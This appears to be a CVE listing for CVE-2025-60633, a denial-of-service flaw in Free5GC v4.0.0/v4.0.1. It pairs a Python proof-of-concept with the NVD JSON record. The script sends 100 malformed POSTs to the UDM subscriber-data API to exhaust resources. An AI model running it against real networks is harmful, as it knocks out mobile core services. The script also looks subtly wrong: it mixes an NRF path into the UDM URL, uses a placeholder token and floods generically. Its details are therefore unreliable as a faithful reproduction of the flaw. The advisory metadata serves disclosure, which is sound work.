CVE-2025-60633

import requests import json # CVE-2025-60633 PoC - Free5GC Nudm_SubscriberDataManagement DoS # Target: Free5GC v4.0.0 / v4.0.1 # Attack Vector: Malformed API request to Nudm_SubscriberDataManagement endpoint TARGET_IP = "target_free5gc_ip" NUDM_API_BASE = f"http://{TARGET_IP}:5000/nnrf-nfm/v1" SUPER_ID = "2000000001" def exploit_dos(): """Send malformed request to trigger DoS condition""" headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {generate_test_token()}' } # Malformed subscriber data request payload = { 'ueId': 'IMSI-999999999999999', 'subscribedData': { 'pduSessionContexts': [], 'amfSubscriptionId': SUPER_ID } } # Send multiple malformed requests to exhaust resources for i in range(100): try: response = requests.post( f"{NUDM_API_BASE}/nudm-subdatamgmt/v1/{payload['ueId']}", headers=headers, json=payload, timeout=5 ) print(f"Request {i+1}: Status {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request {i+1} failed: {e}") def generate_test_token(): """Generate test authentication token""" # Placeholder for token generation logic return "test_token_placeholder" if __name__ == "__main__": print("CVE-2025-60633 PoC - Free5GC DoS Exploit") print("Target: Nudm_SubscriberDataManagement API") exploit_dos()

{"cve": {"id": "CVE-2025-60633", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:50.093", "lastModified": "2025-12-01T16:16:12.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Free5GC v4.0.0 and v4.0.1 allowing an attacker to cause a denial of service via the Nudm_SubscriberDataManagement API."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "6AAA449D-BC30-48D9-BD40-912F36A6BB12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:4.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "685CADC6-6235-4ACC-AB3A-0A0E3E12FA0D"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/free5gc/free5gc/issues/700", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/free5gc/free5gc/issues/701", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/free5gc/free5gc/issues/702", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/free5gc/free5gc/issues/703", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}